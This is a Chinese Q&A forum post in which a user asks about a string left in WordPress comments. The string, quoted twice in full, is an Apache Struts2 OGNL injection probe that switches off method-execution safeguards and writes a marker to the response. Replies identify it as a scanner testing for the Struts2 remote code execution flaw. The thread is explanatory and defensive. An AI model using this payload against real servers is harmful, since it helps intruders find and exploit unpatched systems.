javascript - 有人在wordpress评论里写这个，这段代码是干什么用的？

‘+(#context[”xwork.methodaccessor.denymethodexecution”]=new java.lang.boolean(false),#_memberaccess[”allowstaticmethodaccess”]=new java.lang.boolean(true),#_memberaccess.excludeproperties={},#a_str=’814f60bd-f6df-4227-‘,#b_str=’86f5-8d9fbf26a2eb’,#a_resp=@org.apache.struts2.servletactioncontext@getresponse(),#a_resp.getwriter().println(#a_str+#b_str),#a_resp.getwriter().flush(),#a_resp.getwriter().close())+’

回复内容：

‘+(#context[”xwork.methodaccessor.denymethodexecution”]=new java.lang.boolean(false),#_memberaccess[”allowstaticmethodaccess”]=new java.lang.boolean(true),#_memberaccess.excludeproperties={},#a_str=’814f60bd-f6df-4227-‘,#b_str=’86f5-8d9fbf26a2eb’,#a_resp=@org.apache.struts2.servletactioncontext@getresponse(),#a_resp.getwriter().println(#a_str+#b_str),#a_resp.getwriter().flush(),#a_resp.getwriter().close())+’

印象中有这么一个java的struts2框架远程执行任意代码的漏洞

阿里云-虚拟数字人

阿里云-虚拟数字人是什么？ ...

2

查看详情

一般这种都是扫漏洞的脚本所为，如果不是用的只是wordpress，那你装一个防止垃圾评论的插件即可，不影响